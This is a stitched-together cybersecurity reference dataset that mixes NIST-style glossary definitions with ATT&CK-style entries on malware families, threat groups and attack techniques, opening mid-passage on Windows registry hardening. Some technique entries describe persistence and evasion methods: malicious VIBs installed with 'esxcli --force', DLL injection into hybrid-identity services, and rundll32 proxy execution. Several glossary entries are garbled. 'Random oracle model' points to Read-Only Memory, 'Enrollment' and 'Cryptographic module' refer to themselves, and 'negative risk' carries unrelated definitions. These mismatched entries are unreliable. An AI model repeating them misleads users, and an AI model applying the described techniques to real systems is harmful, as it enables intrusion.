- Use Event Viewer or SIEM solutions to analyze logs and detect suspicious activity.
- Example Audit Policy: `auditpol /set /subcategory:"Registry" /success:enable /failure:enable`

Protect Credential-Related Hives

- Limit access to hives like `SAM`,`SECURITY`, and `SYSTEM` to prevent credential dumping or other unauthorized access.
- Use LSA Protection to add an additional security layer for credential storage.

Restrict Registry Editor Usage

- Use Group Policy to restrict access to regedit.exe for non-administrative users.
- Block execution of registry editing tools on endpoints where they are unnecessary.

Deploy Baseline Configuration Tools

- Use tools like Microsoft Security Compliance Toolkit or CIS Benchmarks to apply and maintain secure registry configurations.

*Tools for Implementation* 

Registry Permission Tools:

- Registry Editor (regedit): Built-in tool to manage registry permissions.
- PowerShell: Automate permissions and manage keys. `Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "KeyName" -Value "Value"`
- icacls: Command-line tool to modify ACLs.

Monitoring Tools:

- Sysmon: Monitor and log registry events.
- Event Viewer: View registry access logs.

Policy Management Tools:

- Group Policy Management Console (GPMC): Enforce registry permissions via GPOs.
- Microsoft Endpoint Manager: Deploy configuration baselines for registry permissions.

Name: Cherry Picker
Type: malware
Description: Cherry Picker is a point of sale (PoS) memory scraper.

Term: false accept rate (FAR)
Definition: Proportion of verification transactions with wrongful claims of identity that are incorrectly confirmed.

Term: VRF
Definition: Confirmation, through the provision of objective evidence, that specified requirements have been fulfilled (e.g., an entity’s requirements have been correctly defined, or an entity’s attributes have been correctly presented; or a procedure or function performs as intended and leads to the expected outcome).

Term: certificate revocation list (CRL)
Definition: A list of revoked public key certificates&nbsp;created and digitally signed by a certification&nbsp;authority.

Term: Complementary Error Function
Definition: See Erfc.

Term: ID
Definition: A set of attributes that uniquely describe a person within a given context.

Term: Prime number
Definition: An integer that is greater than 1 and divisible only by 1 and itself.

Term: Capture
Definition: The method of taking a biometric sample from an end user.

Term: Vulnerability Management
Definition: See Capability, Vulnerability Management.

Term: Security Authorization
Definition: The granting or denying of access rights to a user, program, or process.

Term: Cybersecurity Incident
Definition: A cybersecurity event that has been determined to have an impact on the organization prompting the need for response and recovery.

Term: Kolmogorov-Smirnov Test
Definition: A statistical test that may be used to determine if a set of data comes from a particular probability distribution.

Name: NETEAGLE
Type: malware
Description: NETEAGLE is a backdoor developed by APT30 with compile dates as early as 2008. It has two main variants known as “Scout” and “Norton.”

Term: PNT data
Definition: All information used to form or disseminate PNT solutions, including signals, waveforms, and network packets.

Term: Exterior Border Gateway Protocol
Definition: A BGP operation communicating routing information between two or more ASes.

Term: AC
Definition: The decision to permit or deny a subject access to system objects (network, data, application, service, etc.)

Term: Key-derivation method
Definition: As used in this Recommendation, a process that derives secret keying material from a shared secret. This Recommendation specifies both one-step and two-step key-derivation methods.

Term: Loop-Back Mode
Definition: An operating system facility that allows a device to be mounted via a loopback address and viewed logically on the PC.

Term: ongoing assessment and authorization
Definition: The continuous evaluation of the effectiveness of security control or privacy control implementation; with respect to security controls, a subset of Information Security Continuous Monitoring (ISCM) activities.

Term: MacTagBits
Definition: The bit length of the MAC tag such that MacTagBits = 8 ´ MacTagLen.

Name: BlackOasis
Type: intrusion-set
Description: BlackOasis is a Middle Eastern threat group that is believed to be a customer of Gamma Group. The group has shown interest in prominent figures in the United Nations, as well as opposition bloggers, activists, regional news correspondents, and think tanks. A group known by Microsoft as NEODYMIUM is reportedly associated closely with BlackOasis operations, but evidence that the group names are aliases has not been identified.

Term: Content Type
Definition: The form of the checklist content in terms of the degree of automation and standardization. Examples include Prose, Automated, and SCAP Content.

Term: Presentation Attack Detection (PAD)
Definition: Automated determination of a presentation attack. A subset of presentation attack determination methods (i.e., liveness detection) involves the measurement and analysis of anatomical characteristics or voluntary or involuntary reactions to determine whether a biometric sample is being captured from a living subject that is present at the point of capture.

Term: Metrology
Definition: The sub-component of a Smart Meter responsible for measuring and calculating Metered Data that may be used for register readings, time-of-use readings, load profile data, and other electrical or revenue measurement purposes. The Metrology may or may not be a separate electronic element and may or may not include other electronic elements or interfaces as well.

Term: cyber incident
Definition: Actions taken through the use of an information system or network that result in an actual or potentially adverse effect on an information system, network, and/or the information residing therein.

Term: critical infrastructure
Definition: Essential services and related assets that underpin American society and serve as the backbone of the nation's economy, security, and health.

Term: Enrollment
Definition: See Enrollment.

Term: FCKMS Device (Device)
Definition: Any combination of FCKMS components that serve a specific purpose (e.g., firewalls, routers, transmission devices, cryptographic modules, and data storage devices).

Term: <em>S</em>
Definition: The summation symbol.

Term: Enrollment
Definition: Making a person’s identity known to the enrollment/Identity Management System information system by associating a unique identifier with that identity, and collecting and recording the person’s relevant attributes into the information system. Registration is necessary in order to initiate other processes, such as adjudication, card/token personalization and issuance and, maintenance that are necessary to issue and to re-issue or maintain a PIV Card or a Derived PIV Credential token.

Name: AADInternals
Type: tool
Description: AADInternals is a PowerShell-based framework for administering, enumerating, and exploiting Azure Active Directory. The tool is publicly available on GitHub.

Term: Competency
Definition: A mechanism for organizations to assess learners.

Term: Cryptographic module
Definition: See Cryptographic module.

Term: computer abuse
Definition: Intentional or reckless misuse, alteration, disruption, or destruction of information processing resources.

Term: trade-off
Definition: Decision-making actions that select from various requirements and alternative solutions on the basis of net benefit to the stakeholders.

Term: FCKMS Component (Component)
Definition: Any hardware, software, or firmware that is used to implement an FCKMS.

Term: authentication protocol
Definition: A defined sequence of messages between a claimant and a verifier that demonstrates that the claimant has possession and control of one or more valid authenticators to establish their identity and, optionally, demonstrates that the claimant is communicating with the intended verifier.

Term: telecommunications security (TSEC) nomenclature
Definition: The National Security Agency (NSA) system for identifying the type and purpose of certain items of COMSEC material.

Term: Preimage resistance
Definition: An expected property of a cryptographic hash function such that, given a randomly chosen message digest, message_digest, it is computationally infeasible to find a preimage of the message_digest, See “Preimage”.

Term: IPsec
Definition: An OSI Network layer security protocol that provides authentication and encryption over IP networks.

Term: Transport Layer Security (TLS)
Definition: Provides privacy and data integrity between two communicating applications. It is designed to encapsulate other protocols, such as HTTP. TLS v1.0 was released in 1999, providing slight modifications to SSL 3.0.

Term: Cyber Threat
Definition: Any circumstance or event with the potential to adversely impact organizational operations.

Term: Key-derivation key
Definition: A key used with a key-derivation method to derive additional keys. Sometimes called a master key.

Name: FALLCHILL
Type: malware
Description: FALLCHILL is a RAT that has been used by Lazarus Group since at least 2016 to target the aerospace, telecommunications, and finance industries. It is usually dropped by other Lazarus Group malware or delivered when a victim unknowingly visits a compromised website.

Term: Owner
Definition: An Informative Reference produced by the owner of the Reference Document.

Name: Startup Items
Type: attack-pattern
Description: Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.

This is technically a deprecated technology (superseded by Launch Daemon), and thus the appropriate folder, <code>/Library/StartupItems</code> isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), <code>StartupParameters.plist</code>, reside in the top-level directory. 

An adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism. Additionally, since StartupItems run during the bootup phase of macOS, they will run as the elevated root user.

Term: Information System User
Definition: The term user refers to an individual, group, host, domain, trusted communication channel, network address/port, another netwoik, a remote system (e.g., operations system), or a process (e.g., service or program) that accesses the network, or is accessed by it, including any entity that accesses a network support entity to perform OAM&Prelated tasks. Regardless of their role, users must be required to successfully pass an identification and authentication (I&A) mechanism. For example, I&A would be required for a security or system administrator. For customers, I&A could be required for billing purposes.
For some services (e.g.. Emergency Services) a customer may not need to be authenticated by the system.

Term: AID
Definition: A globally unique identifier of a card application as defined in ISO/IEC 7816-4.

Term: System initialization
Definition: A function in the lifecycle of keying material; setting up and configuring a system for secure operation.

Term: FMR
Definition: False Match Rate (defined over single comparisons)

Term: system boundary
Definition: All components of an information system to be authorized for operation by an authorizing official. This excludes separately authorized systems to which the information system is connected. Formerly known as "accreditation boundary".

Name: Restrict Web-Based Content
Type: course-of-action
Description: Restricting web-based content involves enforcing policies and technologies that limit access to potentially malicious websites, unsafe downloads, and unauthorized browser behaviors. This can include URL filtering, download restrictions, script blocking, and extension control to protect against exploitation, phishing, and malware delivery. This mitigation can be implemented through the following measures:

Deploy Web Proxy Filtering:

- Use solutions to filter web traffic based on categories, reputation, and content types.
- Enforce policies that block unsafe websites or file types at the gateway level.

Enable DNS-Based Filtering:

- Implement tools to restrict access to domains associated with malware or phishing campaigns.
- Use public DNS filtering services to enhance protection.

Enforce Content Security Policies (CSP):

- Configure CSP headers on internal and external web applications to restrict script execution, iframe embedding, and cross-origin requests.

Control Browser Features:

- Disable unapproved browser features like automatic downloads, developer tools, or unsafe scripting.
- Enforce policies through tools like Group Policy Management to control browser settings.

Monitor and Alert on Web-Based Threats:

- Use SIEM tools to collect and analyze web proxy logs for signs of anomalous or malicious activity.
- Configure alerts for access attempts to blocked domains or repeated file download failures.

Term: Rivest-Shamir-Adleman
Definition: Algorithm developed by Rivest, Shamir and Adelman (allowed in FIPS 186-3 and specified in ANS X9.31 and PKCS #1).

Name: vSphere Installation Bundles
Type: attack-pattern
Description: Adversaries may abuse vSphere Installation Bundles (VIBs) to establish persistent access to ESXi hypervisors. VIBs are collections of files used for software distribution and virtual system management in VMware environments. Since ESXi uses an in-memory filesystem where changes made to most files are stored in RAM rather than in persistent storage, these modifications are lost after a reboot. However, VIBs can be used to create startup tasks, apply custom firewall rules, or deploy binaries that persist across reboots. Typically, administrators use VIBs for updates and system maintenance.

VIBs can be broken down into three components:

* VIB payload: a `.vgz` archive containing the directories and files to be created and executed on boot when the VIBs are loaded. 
* Signature file: verifies the host acceptance level of a VIB, indicating what testing and validation has been done by VMware or its partners before publication of a VIB. By default, ESXi hosts require a minimum acceptance level of PartnerSupported for VIB installation, meaning the VIB is published by a trusted VMware partner. However, privileged users can change the default acceptance level using the `esxcli` command line interface. Additionally, VIBs are able to be installed regardless of acceptance level by using the <code> esxcli software vib install --force</code> command. 
* XML descriptor file: a configuration file containing associated VIB metadata, such as the name of the VIB and its dependencies. 

Adversaries may leverage malicious VIB packages to maintain persistent access to ESXi hypervisors, allowing system changes to be executed upon each bootup of ESXi – such as using `esxcli` to enable firewall rules for backdoor traffic, creating listeners on hard coded ports, and executing backdoors. Adversaries may also masquerade their malicious VIB files as PartnerSupported by modifying the XML descriptor file.

Term: IoT
Definition: The network of devices that contain the hardware, software, firmware, and actuators which allow the devices to connect, interact, and freely exchange data and information.

Name: Dok
Type: malware
Description: Dok is a Trojan application disguised as a .zip file that is able to collect user credentials and install a malicious proxy server to redirect a user's network traffic (i.e. Adversary-in-the-Middle).

Term: NC
Definition: A time-varying value that has at most an acceptably small chance of repeating. For example, the nonce may be a random value that is generated anew for each use, a timestamp, a sequence number, or some combination of these.

Term: information system component
Definition: An element such as a fingerprint capture station or card reader used by an issuer, for which [FIPS 201-2] has defined specific requirements.

Term: safeguards
Definition: Protective measures prescribed to meet the security requirements (i.e., confidentiality, integrity, and availability) specified for an information system. Safeguards may include security features, management constraints, personnel security, and security of physical structures, areas, and devices. Synonymous with security controls and countermeasures.

Term: mechanisms
Definition: An assessment object that includes specific protection-related items (e.g., hardware, software, or firmware) employed within or at the boundary of an information system.

Term: security assessment
Definition: The testing and/or evaluation of the management, operational, and technical security controls in an information system to determine the extent to which the controls are implemented correctly, operating as intended, and producing the desired outcome with respect to meeting the security requirements for the system.

Name: Solar
Type: malware
Description: Solar is a C#/.NET backdoor that was used by OilRig during the Outer Space campaign to download, execute, and exfiltrate files.

Name: Fast Flux DNS
Type: attack-pattern
Description: Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.

The simplest, "single-flux" method, involves registering and de-registering an addresses as part of the DNS A (address) record list for a single DNS name. These registrations have a five-minute average lifespan, resulting in a constant shuffle of IP address resolution.

In contrast, the "double-flux" method registers and de-registers an address as part of the DNS Name Server record list for the DNS zone, providing additional resilience for the connection. With double-flux additional hosts can act as a proxy to the C2 host, further insulating the true source of the C2 channel.

Term: Prepare for Events
Definition: An ISCM capability that ensures that procedures and resources are in place to respond to both routine and unexpected events that can compromise security. The unexpected events include both actual attacks and contingencies (natural disasters) like fires, floods, earthquakes, etc.

Term: negative risk
Definition: The potential for a “threat source” (defined below) to exploit (intentional) or trigger (accidental) a specific vulnerability.

Name: MimiPenguin
Type: tool
Description: MimiPenguin is a credential dumper, similar to Mimikatz, designed specifically for Linux platforms.

Name: TEXTMATE
Type: malware
Description: TEXTMATE is a second-stage PowerShell backdoor that is memory-resident. It was observed being used along with POWERSOURCE in February 2017.

Term: Concatenation
Definition: The concatenation of bit strings <i>A</i> and <i>B.</i>

Term: Cryptographic module
Definition: The set of hardware, software, and/or firmware that implements approved security functions (including cryptographic algorithms and key generation) and is contained within the cryptographic boundary.

Term: block
Definition: A data structure containing a block header and block data.

Name: APT1
Type: intrusion-set
Description: APT1 is a Chinese threat group that has been attributed to the 2nd Bureau of the People’s Liberation Army (PLA) General Staff Department’s (GSD) 3rd Department, commonly known by its Military Unit Cover Designator (MUCD) as Unit 61398.

Term: binary label
Definition: A single label indicating a product has met a baseline standard.

Term: Key revocation
Definition: A stage in the lifecycle of keying material; a process whereby a notice is made available to affected entities that keying material should be removed from operational use prior to the end of the established cryptoperiod of that keying material.

Term: replay attack
Definition: An attack in which the attacker is able to replay previously captured messages between a legitimate claimant and a verifier to masquerade as that claimant to the verifier or vice versa.

Term: security specification
Definition: A document that specifies, in a complete, precise, verifiable manner, the requirements, design, behavior, or other characteristics of a system or component and often the procedures for determining whether these provisions have been satisfied. 
Refer to security specification.

Name: Compromise Hardware Supply Chain
Type: attack-pattern
Description: Adversaries may manipulate hardware components in products prior to receipt by a final consumer for the purpose of data or system compromise. By modifying hardware or firmware in the supply chain, adversaries can insert a backdoor into consumer networks that may be difficult to detect and give the adversary a high degree of control over the system. Hardware backdoors may be inserted into various devices, such as servers, workstations, network infrastructure, or peripherals.

Term: system high
Definition: Highest security level supported by an information system.

Term: cyber ecosystem
Definition: The aggregation and interactions of a variety of diverse participants (such as private firms, non‐profits, governments, individuals, and processes) and cyber devices (computers, software, and communications technologies).

Term: <em>Key management product</em>
Definition: A key management product is a cryptographic key (symmetric or asymmetric) or certificate used for encryption, decryption, digital signature, or signature verification; and other items, such as certificate revocation lists and compromised key lists, obtained by trusted means from the same source, which validate the authenticity of keys or certificates. Software that performs either a security or cryptographic function (e.g., keying material accounting and control, random number generation, cryptographic module verification) is also considered to be a cryptographic product.

Term: System Test
Definition: A test performed on a complete system to evaluate its compliance with specified requirements.

Term: Trusted Third Party
Definition: An entity other than the key pair owner and verifier that is trusted by the owner or the verifier or both. Sometimes shortened to “trusted party.”

Term: Cumulative Sums Forward Test
Definition: The purpose of the cumulative sums test is to determine whether the sum of the partial sequences occurring in the tested sequence is too large or too small.

Term: High-Value Asset
Definition: Those assets, federal information systems, information, and data for which an unauthorized access, use, disclosure, disruption, modification, or destruction could cause a significant impact to the United States' national security interests, foreign relations, economy – or to the public confidence, civil liberties, or public health and safety of the American people.

Term: network
Definition: A system implemented with a collection of interconnected components. Such components may include routers, hubs, cabling, telecommunications controllers, key distribution centers, and technical control devices.

Term: Predictability
Definition: Enabling of reliable assumptions by individuals, owners, and operators about PII and its processing by a system.

Term: Data Link Layer
Definition: Layer of the TCP/IP protocol stack that handles communications on the physical network components such as Ethernet.

Term: Risk Adaptive (Adaptable) Access Control
Definition: A form of access control that uses an authorization policy that takes into account operational need, risk, and heuristics.

Term: CSF Organizational Profile
Definition: A mechanism for describing an organization’s current and/or target cybersecurity posture in terms of the CSF Core’s outcomes.

Term: limited dataset
Definition: A limited data set is protected health information that excludes the following direct identifiers of the individual or of relatives, employers, or household members of the individual (i) Names; (ii) Postal address information, other than town or city, State, and zip code; (iii) Telephone numbers; (iv) Fax numbers; (v) Electronic mail addresses; (vi) Social security numbers; (vii) Medical record numbers; (viii) Health plan beneficiary numbers; (ix) Account numbers; (x) Certificate/license numbers; (xi) Vehicle identifiers and serial numbers, including license plate numbers; (xii) Device identifiers and serial numbers; (xiii) Web Universal Resource Locators (URLs); (xiv) Internet Protocol (IP) address numbers; (xv) Biometric identifiers, including finger and voice prints; and (xvi) Full face photographic images and any comparable images. Limited data sets can contain complete dates, age to the nearest hour, city, state, and complete ZIP code.

Term: flooding
Definition: An attack in which an attacker sends large numbers of wireless messages at a high rate to prevent the wireless network from processing legitimate traffic.

Term: design margin
Definition: The margin allocated during design based on assessments of uncertainty and unknowns. This margin is often consumed as the design matures.

Term: CAIS
Definition: Any system incorporating critical software and in which failure can cause substantial harm to the public.

Name: Credential Stuffing
Type: attack-pattern
Description: Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.

Credential stuffing is a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies.

Typically, management services over commonly used ports are used when stuffing credentials. Commonly targeted services include the following:

* SSH (22/TCP)
* Telnet (23/TCP)
* FTP (21/TCP)
* NetBIOS / SMB / Samba (139/TCP & 445/TCP)
* LDAP (389/TCP)
* Kerberos (88/TCP)
* RDP / Terminal Services (3389/TCP)
* HTTP/HTTP Management Services (80/TCP & 443/TCP)
* MSSQL (1433/TCP)
* Oracle (1521/TCP)
* MySQL (3306/TCP)
* VNC (5900/TCP)

In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.

Term: random oracle model
Definition: See Read-Only Memory.

Term: Virtual Machine (VM)
Definition: A software-defined complete execution stack consisting of virtualized hardware, operating system (guest OS), and applications.

Term: post‐processing invariance
Definition: A property of differential privacy. It says that the output of a differentially private mechanism remains differentially private, even if further processing is performed on it.

Term: hash function
Definition: A function that maps a bit string of arbitrary length to a fixed-length bit string. Approved hash functions satisfy the following properties: 1. (One-way) It is computationally infeasible to find any input that maps to any pre-specified output, and 2. (Collision resistant) It is computationally infeasible to find any two distinct inputs that map to the same output.

Name: C0027
Type: campaign
Description: C0027 was a financially-motivated campaign linked to Scattered Spider that targeted telecommunications and business process outsourcing (BPO) companies from at least June through December of 2022. During C0027 Scattered Spider used various forms of social engineering, performed SIM swapping, and attempted to leverage access from victim environments to mobile carrier networks.

Term: CIO
Definition: Agency official responsible for: (i) Providing advice and other assistance to the head of the executive agency and other senior management personnel of the agency to ensure that information technology is acquired and information resources are managed in a manner that is consistent with laws, executive orders, directives, policies, regulations, and priorities established by the head of the agency; (ii) Developing, maintaining, and facilitating the implementation of a sound and integrated information technology architecture for the agency; and (iii) Promoting the effective and efficient design and operation of all major information resources management processes for the agency, including improvements to work processes of the agency.

Term: quality property
Definition: An emergent property of a system that includes, for example: safety, security, maintainability, resilience, reliability, availability, agility, and survivability. This property is also referred to as a systemic property across many engineering domains.

Term: Cybersecurity State
Definition: The condition of a device’s cybersecurity expressed in a way that is meaningful and useful to authorized entities. For example, a very simple device might express its state in terms of whether or not it is operating as expected, while a complex device might perform cybersecurity logging, check its integrity at boot and report the results, and examine and report additional aspects of its cybersecurity state.

Term: Scalability
Definition: The ability to support more users, concurrent sessions, and throughput than a single SSL VPN device can typically handle.

Name: OnionDuke
Type: malware
Description: OnionDuke is malware that was used by APT29 from 2013 to 2015.

Name: MoonWind
Type: malware
Description: MoonWind is a remote access tool (RAT) that was used in 2016 to target organizations in Thailand.

Term: public key cryptography (PKC)
Definition: Cryptography that uses two separate keys to exchange data — one to encrypt or digitally sign the data and one to decrypt the data or verify the digital signature. Also known as public-key cryptography.

Term: access control
Definition: The process of permitting or restricting access to applications at a granular level, such as per-user, per-group, and per-resources.

Term: Random Binary Sequence
Definition: A sequence of bits for which the probability of each bit being a “0” or “1” is ½. The value of each bit is independent of any other bit in the sequence, i.e., each bit is unpredictable.

Term: MF
Definition: A characteristic of an authentication system or an authenticator that requires more than one distinct authentication factor for successful authentication. MFA can be performed using a single authenticator that provides more than one factor or by a combination of authenticators that provide different factors. 
The three authentication factors are something you know, something you have, and something you are.

Term: Capability, Anomalous Event Response and Recovery Management
Definition: See Capability, Anomalous Event Response and Recovery Management.

Name: Wevtutil
Type: tool
Description: Wevtutil is a Windows command-line utility that enables administrators to retrieve information about event logs and publishers.

Name: APT-C-36
Type: intrusion-set
Description: APT-C-36 is a suspected South American threat group that has engaged in espionage and financially motivated operations since at least 2018. APT-C-36 has targeted government institutions and entities in the financial, energy, and professional manufacturing sectors across Colombia and other Latin American countries.

Term: Reciprocal Agreement
Definition: An agreement that allows two organizations to back up each other.

Term: I
Definition: Input Block

Name: FLIPSIDE
Type: malware
Description: FLIPSIDE is a simple tool similar to Plink that is used by FIN5 to maintain access to victims.

Name: Hybrid Identity
Type: attack-pattern
Description: Adversaries may patch, modify, or otherwise backdoor cloud authentication processes that are tied to on-premises user identities in order to bypass typical authentication mechanisms, access credentials, and enable persistent access to accounts. 

Many organizations maintain hybrid user and device identities that are shared between on-premises and cloud-based environments. These can be maintained in a number of ways. For example, Microsoft Entra ID includes three options for synchronizing identities between Active Directory and Entra ID:

* Password Hash Synchronization (PHS), in which a privileged on-premises account synchronizes user password hashes between Active Directory and Entra ID, allowing authentication to Entra ID to take place entirely in the cloud 
* Pass Through Authentication (PTA), in which Entra ID authentication attempts are forwarded to an on-premises PTA agent, which validates the credentials against Active Directory 
* Active Directory Federation Services (AD FS), in which a trust relationship is established between Active Directory and Entra ID 

AD FS can also be used with other SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication process to AD FS and receive a token containing the hybrid users’ identity and privileges. 

By modifying authentication processes tied to hybrid identities, an adversary may be able to establish persistent privileged access to cloud resources. For example, adversaries who compromise an on-premises server running a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService` process that authorizes all attempts to authenticate to Entra ID, as well as records user credentials. In environments using AD FS, an adversary may edit the `Microsoft.IdentityServer.Servicehost` configuration file to load a malicious DLL that generates authentication tokens for any user with any set of claims, thereby bypassing multi-factor authentication and defined AD FS policies.

In some cases, adversaries may be able to modify the hybrid identity authentication process from the cloud. For example, adversaries who compromise a Global Administrator account in an Entra ID tenant may be able to register a new PTA agent via the web console, similarly allowing them to harvest credentials and log into the Entra ID environment as any user.

Name: FIN6
Type: intrusion-set
Description: FIN6 is a cyber crime group that has stolen payment card data and sold it for profit on underground marketplaces. This group has aggressively targeted and compromised point of sale (PoS) systems in the hospitality and retail sectors.

Term: negative risk
Definition: Any circumstance or event with the potential to harm an information system through unauthorized access, destruction, disclosure, modification of data, and/or denial of service. Threats arise from human actions and natural events.

Term: Seedlife
Definition: The length of the seed period.

Term: Confidentiality Mode
Definition: A mode that is used to encipher plaintext and decipher ciphertext. The confidentiality modes in this recommendation are the ECB, CBC, CFB, OFB, and CTR modes.

Term: Onboarding
Definition: The process by which a device obtains the credentials (e.g., network SSID and password) that it needs in order to gain access to a wired or wireless network.

Term: impact level
Definition: The assessed worst-case potential impact that could result from a compromise of the confidentiality, integrity, or availability of information expressed as a value of low, moderate, or high.

Term: CE
Definition: A purge sanitization technique in which key sanitization is applied to one or more keys providing confidentiality protections for the encrypted target data, making recovery of the decrypted target data infeasible.

Term: Elliptic Curve Digital Signature Algorithm
Definition: a digital signature algorithm that is an analog of DSA using elliptic curve mathematics and specified in ANSI draft standard X9.62.

Name: Software Extensions
Type: attack-pattern
Description: Adversaries may abuse software extensions to establish persistent access to victim systems. Software extensions are modular components that enhance or customize the functionality of software applications, including web browsers, Integrated Development Environments (IDEs), and other platforms. Extensions are typically installed via official marketplaces, app stores, or manually loaded by users, and they often inherit the permissions and access levels of the host application. 

 
Malicious extensions can be introduced through various methods, including social engineering, compromised marketplaces, or direct installation by users or by adversaries who have already gained access to a system. Malicious extensions can be named similarly or identically to benign extensions in marketplaces. Security mechanisms in extension marketplaces may be insufficient to detect malicious components, allowing adversaries to bypass automated scanners or exploit trust established during the installation process. Adversaries may also abuse benign extensions to achieve their objectives, such as using legitimate functionality to tunnel data or bypass security controls. 

The modular nature of extensions and their integration with host applications make them an attractive target for adversaries seeking to exploit trusted software ecosystems. Detection can be challenging due to the inherent trust placed in extensions during installation and their ability to blend into normal application workflows.

Name: SEO Poisoning
Type: attack-pattern
Description: Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms.

To help facilitate Drive-by Compromise, adversaries may stage content that explicitly manipulates SEO rankings in order to promote sites hosting their malicious payloads (such as Drive-by Target) within search engines. Poisoning SEO rankings may involve various tricks, such as stuffing keywords (including in the form of hidden text) into compromised sites. These keywords could be related to the interests/browsing habits of the intended victim(s) as well as more broad, seasonably popular topics (e.g. elections, trending news).

In addition to internet search engines (such as Google), adversaries may also aim to manipulate specific in-site searches for developer platforms (such as GitHub) to deceive users towards Supply Chain Compromise lures. In-site searches will rank search results according to their own algorithms and metrics such as popularity which may be targeted and gamed by malicious actors.

Adversaries may also purchase or plant incoming links to staged capabilities in order to boost the site’s calculated relevance and reputation.

SEO poisoning may also be combined with evasive redirects and other cloaking mechanisms (such as measuring mouse movements or serving content based on browser user agents, user language/localization settings, or HTTP headers) in order to feed SEO inputs while avoiding scrutiny from defenders.

Term: Cryptographic algorithm
Definition: 1. A well-defined computational procedure that takes variable inputs, including a cryptographic key, and produces an output.

Term: Reference Document
Definition: A document being compared to a Focal Document. Examples include traditional documents, products, services, education materials, and training.

Term: <em>Probability model</em>
Definition: A mathematical representation of a random phenomenon.

Term: Multi-Factor
Definition: A characteristic of an authentication system or a token that uses more than one authentication factor. 
The three types of authentication factors are something you know, something you have, and something you are.

Term: re-key (a certificate)
Definition: To change the value of a cryptographic key that is being used in a cryptographic system application; this normally entails issuing a new certificate on the new public key. NIST SP 800-32 under Re-key (a certificate)

Term: Identity authentication
Definition: The process of providing assurance about the identity of an entity interacting with a system (e.g., to access a resource). Sometimes called entity authentication.

Name: CookieMiner
Type: malware
Description: CookieMiner is mac-based malware that targets information associated with cryptocurrency exchanges as well as enabling cryptocurrency mining on the victim system itself. It was first discovered in the wild in 2019.

Term: FEA
Definition: A business-based framework for government-wide improvement developed by the Office of Management and Budget that is intended to facilitate efforts to transform the federal government to one that is citizen-centered, results-oriented, and market-based.

Term: Biased
Definition: A value that is chosen from an alphabet space is said to be biased if one value is more likely to be chosen than another value. (Contrast with unbiased.)

Term: NPPI
Definition: Information about a person that is not publicly known; called “private information” in some other publications.

Term: baseline
Definition: See control baseline.

Term: sensitivity
Definition: Used in this guideline to mean a measure of the importance assigned to information by its owner, for the purpose of denoting its need for protection.

Term: PHI
Definition: individually identifiable health information (1) Except as provided in paragraph (2) of this definition, that is (i) Transmitted by electronic media; Maintained in electronic media; or (iii) Transmitted or maintained in any other form or medium. (2) Protected health information excludes individually identifiable health information in (i) Education records covered by the Family Educational Rights and Privacy Act, as amended, 20 U.S.C. 1232g; (ii) Records described at 20 U.S.C. 1232g(a)(4)(B)(iv); and Employment records held by a covered entity in its role as employer.

Name: Container Orchestration Job
Type: attack-pattern
Description: Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.

In Kubernetes, a CronJob may be used to schedule a Job that runs one or more containers to perform specific tasks. An adversary therefore may utilize a CronJob to schedule deployment of a Job that executes malicious code in various nodes within a cluster.

Name: THINCRUST
Type: malware
Description: THINCRUST is a Python-based backdoor tool that has been used by UNC3886 since at least 2023.

Term: JPEG
Definition: A standardized image compression function originally established by the Joint Photographic Experts Group.

Term: Test
Definition: An evaluation tool that uses quantifiable metrics to validate the operability of a system or system component in an operational environment specified in an IT plan.

Term: Communicate-P (Function)
Definition: Develop and implement appropriate activities to enable organizations and individuals to have a reliable understanding and engage in a dialogue about how data are processed and associated privacy risks.

Name: TA551
Type: intrusion-set
Description: TA551 is a financially-motivated threat group that has been active since at least 2018. The group has primarily targeted English, German, Italian, and Japanese speakers through email-based malware distribution campaigns.

Name: Caterpillar WebShell
Type: malware
Description: Caterpillar WebShell is a self-developed Web Shell tool created by the group Volatile Cedar.

Term: RA
Definition: The process of identifying, estimating, and prioritizing risks to organizational operations (including mission, functions, image, reputation), organizational assets, individuals, other organizations, and the Nation, resulting from the operation of an information system. Part of risk management incorporates threat and vulnerability analyses, and considers mitigations provided by security controls planned or in place. Synonymous with risk analysis.

Term: expert determination
Definition: Within the context of de-identification, refers to the Expert Determination method for de-identifying protected health information in accordance with the HIPAA Privacy Rule de-identification standard.

Name: SUNBURST
Type: malware
Description: SUNBURST is a trojanized DLL designed to fit within the SolarWinds Orion software update framework. It was used by APT29 since at least February 2020.

Term: <em>Pj</em>
Definition: The jth plaintext block.

Term: Archive facility
Definition: A facility used for long-term key and/or metadata storage.

Term: Authorized Key
Definition: A public key that has been configured as authorizing access to an account by anyone capable of using the corresponding private key (identity key) in the SSH protocol. An authorized key may be configured with certain restrictions, most notably a forced command and a source restriction.

Name: Rundll32
Type: attack-pattern
Description: Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: <code>rundll32.exe {DLLname, DLLfunction}</code>).

